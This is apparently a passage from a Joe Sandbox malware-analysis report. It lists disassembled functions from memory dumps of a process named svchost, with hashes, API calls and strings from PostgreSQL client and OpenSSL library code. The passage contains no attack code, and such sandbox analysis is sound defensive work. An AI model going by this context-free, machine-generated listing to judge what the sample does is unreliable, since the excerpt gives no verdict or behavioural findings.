                                                                                            • API String ID: 1521657377-737636320
                                                                                            • Opcode ID: 074450965423942cefc9357b9ea067bec30b7a2c326155d897dac7edac3fbefc
                                                                                            • Instruction ID: 826a0c8c55a3b0e5b29aaa57b4e2708ec3520aa5e5ae89f56e26e9518b9c6a8c
                                                                                            • Opcode Fuzzy Hash: 074450965423942cefc9357b9ea067bec30b7a2c326155d897dac7edac3fbefc
                                                                                            • Instruction Fuzzy Hash: 62210521B0AA4248FA616B25F8383BA52836F89780F5C2131DD4D66797DE2FE11C830C
                                                                                            Function 00007FFDA36E8240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59networkCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$L_get_errorR_clear_errorR_get_error
                                                                                            • String ID: unrecognized SSL error code: %d
                                                                                            • API String ID: 3701004716-952604332
                                                                                            • Opcode ID: 02a047a687f13f7a9f86478cdfdec1976e68288809bcef0581f72d603ca78dee
                                                                                            • Instruction ID: 4d662a4ac5699852023217a69be3e9304269fa8ec0e5ccfa3b66efce0ebb744f
                                                                                            • Opcode Fuzzy Hash: 02a047a687f13f7a9f86478cdfdec1976e68288809bcef0581f72d603ca78dee
                                                                                            • Instruction Fuzzy Hash: 3011B922B07A0245F915AB26A8257BA62426F48FE0F1C5130DD2D563D7DE3DE4058308
                                                                                            Function 00007FFDA36F5CE0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$LastStatus_unlink$CloseHandle_rmdir
                                                                                            • String ID:
                                                                                            • API String ID: 1774506580-0
                                                                                            • Opcode ID: 2335ae7606b33d04b9c9d2b8bd84ff0b697aea561ef6dff8f13415cc08399b5d
                                                                                            • Instruction ID: 826875401bfaa3cf42147341e26843d47a9693cc4ece5af7a52bde7fe6b22a98
                                                                                            • Opcode Fuzzy Hash: 2335ae7606b33d04b9c9d2b8bd84ff0b697aea561ef6dff8f13415cc08399b5d
                                                                                            • Instruction Fuzzy Hash: AE218021F0FA4285F6605B61A9652392293AF40B95F9D6030D64E62B97CE2EEC418B2D
                                                                                            Function 00007FFDA36F5E40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(?,?,?,?,00007FFDA36F43A0,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDA36F5E65
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00007FFDA36F43A0,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFDA36F5E73
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                            • String ID: ntdll.dll
                                                                                            • API String ID: 3568775529-2227199552
                                                                                            • Opcode ID: 19580ed0add17ae7b2876d3daa3a19b57faeaebdc5a5a450045f4867bbb11a35
                                                                                            • Instruction ID: 3c8cd93d513249f7603bc541cbe857cce1bd2d1597081968cba5ea8caa512385
                                                                                            • Opcode Fuzzy Hash: 19580ed0add17ae7b2876d3daa3a19b57faeaebdc5a5a450045f4867bbb11a35
                                                                                            • Instruction Fuzzy Hash: 5521A426F1BB8282FB449B25A46426D3392FF88B84F8C1531DA4E13796DF3DE4458708
                                                                                            Function 00007FFDA36EA650 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 51COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ %d$ NNNN$NotificationResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3690904892
                                                                                            • Opcode ID: 7faf837148ad8942d3d7fe39494ca3e35661f06d59979be2503916a2947dbc88
                                                                                            • Instruction ID: d2622f1e2f86aceb090544b4a4f9e68f98df6363dfcb755f41d1b3ffdc9dbcef
                                                                                            • Opcode Fuzzy Hash: 7faf837148ad8942d3d7fe39494ca3e35661f06d59979be2503916a2947dbc88
                                                                                            • Instruction Fuzzy Hash: 2111E1A2B0B64681FA10DB11E5A16F82363AF407C8F482231DE0E27797DE6FE149C308
                                                                                            Function 00007FFDA36EA867 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputc
                                                                                            • String ID: "%s"$ %d$ErrorResponse$Execute$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 1992160199-3429532571
                                                                                            • Opcode ID: e20a8be7a420778d62b8b16ecbea484d730a2198554cfe0d67d83f26565880a2
                                                                                            • Instruction ID: 0276ef736320037e9f53e339e12431eb0d04fe051f26387da86d7e9444daff41
                                                                                            • Opcode Fuzzy Hash: e20a8be7a420778d62b8b16ecbea484d730a2198554cfe0d67d83f26565880a2
                                                                                            • Instruction Fuzzy Hash: 52118E62B1B68685F610DB11E0616A92362EB447C8F486132EE0E2775BCF7EE589C718
                                                                                            Function 00007FFDA36E82FA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E82FF
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E8309
                                                                                              • Part of subcall function 00007FFDA36EC450: LoadLibraryExA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC4CF
                                                                                              • Part of subcall function 00007FFDA36EC450: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC516
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E83CC
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36E8346
                                                                                            • SSL SYSCALL error: EOF detected, xrefs: 00007FFDA36E8357
                                                                                            • SSL SYSCALL error: %s, xrefs: 00007FFDA36E8332
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_errno$FormatLibraryLoadMessagelibintl_dgettext
                                                                                            • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 4189622251-1474266415
                                                                                            • Opcode ID: 5032b21791e171439d54e85b97cb410c5d30a3fadbef08a9683a4003849c986c
                                                                                            • Instruction ID: d928b5eba1f8f0ea8cfabbc42a119b72e3de3e918460cf91a6ccf956dfb0ad97
                                                                                            • Opcode Fuzzy Hash: 5032b21791e171439d54e85b97cb410c5d30a3fadbef08a9683a4003849c986c
                                                                                            • Instruction Fuzzy Hash: 8C016112B0FA1281F9156BA4E4752B812437F45BA0F6C2232CD2D663D7EE2EF14A831D
                                                                                            Function 00007FFDA36F5330 Relevance: 10.5, APIs: 7, Instructions: 44processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freemallocmemcpysystem
                                                                                            • String ID:
                                                                                            • API String ID: 562932354-0
                                                                                            • Opcode ID: 81338c7065749c26ccc5cd10b7f1d561b49b0187a458b2259af98e824cf22066
                                                                                            • Instruction ID: 883caf76ad842d76dbb88731911089c3dc904e616f59f5545b3f8d59adb1be6f
                                                                                            • Opcode Fuzzy Hash: 81338c7065749c26ccc5cd10b7f1d561b49b0187a458b2259af98e824cf22066
                                                                                            • Instruction Fuzzy Hash: D211A322B0AB8182F7018F55F8542687761FB88FA0F4CA270DB6E53396DF3DD8558724
                                                                                            Function 00007FFDA36F53E0 Relevance: 10.5, APIs: 7, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F540E
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F541C
                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F5439
                                                                                            • _popen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F544B
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F5454
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F545F
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00007FFDA36E374A), ref: 00007FFDA36F5465
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$_popenfreemallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 816778120-0
                                                                                            • Opcode ID: 650a1915481d562adaaf676a04e7f90385b05ad56672cef0e8be1d9a91d73b29
                                                                                            • Instruction ID: 882eaab9b7855092bb9a1cb2e872413f383c1f72c12e074431b47887c6b72b22
                                                                                            • Opcode Fuzzy Hash: 650a1915481d562adaaf676a04e7f90385b05ad56672cef0e8be1d9a91d73b29
                                                                                            • Instruction Fuzzy Hash: 28115E61B0AB8186F7018F22E9641296762FB48FE0F4CA230DA5E577A6DF3DD4458724
                                                                                            Function 00007FFDA36E84F7 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42networkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E84FC
                                                                                            • WSAGetLastError.WS2_32 ref: 00007FFDA36E8506
                                                                                              • Part of subcall function 00007FFDA36EC450: LoadLibraryExA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC4CF
                                                                                              • Part of subcall function 00007FFDA36EC450: FormatMessageA.KERNEL32(?,?,?,?,?,?,?,00007FFDA36EA0D8), ref: 00007FFDA36EC516
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • WSASetLastError.WS2_32 ref: 00007FFDA36E85C9
                                                                                            Strings
                                                                                            • server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request., xrefs: 00007FFDA36E8543
                                                                                            • SSL SYSCALL error: EOF detected, xrefs: 00007FFDA36E8554
                                                                                            • SSL SYSCALL error: %s, xrefs: 00007FFDA36E852F
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_errno$FormatLibraryLoadMessagelibintl_dgettext
                                                                                            • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$server closed the connection unexpectedlyThis probably means the server terminated abnormallybefore or while processing the request.
                                                                                            • API String ID: 4189622251-1474266415
                                                                                            • Opcode ID: ece4707da685c9d9845f8d5ce65848076a04abba7f871d98095f2ee22dae68a1
                                                                                            • Instruction ID: 5b013dc15506cfaedede8f3f6c6768daf79476ce86573491a598fa366d6892b6
                                                                                            • Opcode Fuzzy Hash: ece4707da685c9d9845f8d5ce65848076a04abba7f871d98095f2ee22dae68a1
                                                                                            • Instruction Fuzzy Hash: D001A120B0FA4245FEA46B25D0702F812036F49BA0F5C2232CD2E663D3DE1EF148834C
                                                                                            Function 00007FFDA36EAE8E Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ \x%02x$ReadyForQuery$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-199962393
                                                                                            • Opcode ID: 3ff59ed7103581e2bf6c6cfca38e8c2dcdfd37ac6beb1dce8e8570bd50f01638
                                                                                            • Instruction ID: 707936489d1679975f158210b9ec5e2dd65bfb508091388afab8028d7f246e9c
                                                                                            • Opcode Fuzzy Hash: 3ff59ed7103581e2bf6c6cfca38e8c2dcdfd37ac6beb1dce8e8570bd50f01638
                                                                                            • Instruction Fuzzy Hash: 12018062B0B69782FA10DB11E461BF92362AB447D8F4C6032DE0E17357CE3EE189D748
                                                                                            Function 00007FFDA361B3E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B40C
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B424
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B435
                                                                                            • memcpy.VCRUNTIME140(00007FFDA3616D4C,?,?,?,?,00007FFDA36034DD), ref: 00007FFDA361B452
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugR_set_errormemcpy
                                                                                            • String ID: SSL_set_session_id_context$ssl\ssl_lib.c
                                                                                            • API String ID: 1331007688-832255996
                                                                                            • Opcode ID: eca6ddcf17e5413fe414de273d5c11b961b45bae7fc635cdb515ab5fb3c19ce0
                                                                                            • Instruction ID: ea96ec092b46722cec760f0831edb172fd7e5b3f83c3f6f2841e9fc449519b5b
                                                                                            • Opcode Fuzzy Hash: eca6ddcf17e5413fe414de273d5c11b961b45bae7fc635cdb515ab5fb3c19ce0
                                                                                            • Instruction Fuzzy Hash: F7F08C24F0B15243FB95E66888723B91282EF49344FDCA035D50DA3BD3DF1FE5464619
                                                                                            Function 660147D0 Relevance: 9.2, APIs: 6, Instructions: 191COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ab2c35510a99fe00f6e6f3b60d0c4a5351ba478e170a0304d58f543d5569d1e9
                                                                                            • Instruction ID: cd257ce0aa04095bf610a58fecc9c0142c52d7260b12f9179213d23381c4ee39
                                                                                            • Opcode Fuzzy Hash: ab2c35510a99fe00f6e6f3b60d0c4a5351ba478e170a0304d58f543d5569d1e9
                                                                                            • Instruction Fuzzy Hash: 2A5134F2D0C2906BEB228FD491A479DBFA2E30675DFD14132DA55072A5D3B9CC89C381
                                                                                            Function 00007FFDA36D51A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 83stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freestrncmp
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 1891267927-2050216600
                                                                                            • Opcode ID: 579b684f4fadb034da104a4f3a47dcd31a40e226408c2728510a3aa318c0e858
                                                                                            • Instruction ID: 7c3c3362f4c008b7a549abdd2602281c39d783da9f0c032127a6b5ca00c375f3
                                                                                            • Opcode Fuzzy Hash: 579b684f4fadb034da104a4f3a47dcd31a40e226408c2728510a3aa318c0e858
                                                                                            • Instruction Fuzzy Hash: 29312122B0AB4682FA609F52A56027AA3A2FF84BC0F4C6031DA4D57F5ADF3DD5558708
                                                                                            Function 00007FFDA36F46F0 Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strchr$_fdopenstrstr
                                                                                            • String ID:
                                                                                            • API String ID: 1542700057-0
                                                                                            • Opcode ID: a2594e3e2022d5107230e020d81b7fba5313a188866cd8e5e4a0ae8ca05e8779
                                                                                            • Instruction ID: dd49a5fb399da31e69adcf87f17ca1462bb7b42b09fb7d6202ff497f148e785d
                                                                                            • Opcode Fuzzy Hash: a2594e3e2022d5107230e020d81b7fba5313a188866cd8e5e4a0ae8ca05e8779
                                                                                            • Instruction Fuzzy Hash: BE216D11B0F65146FE05A716A5B62BA12539FC5BC0E5CA430E94E27BDBDE3FE8538208
                                                                                            Function 00007FFDA36DFA50 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 302COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36DFA7C
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36DFD31
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
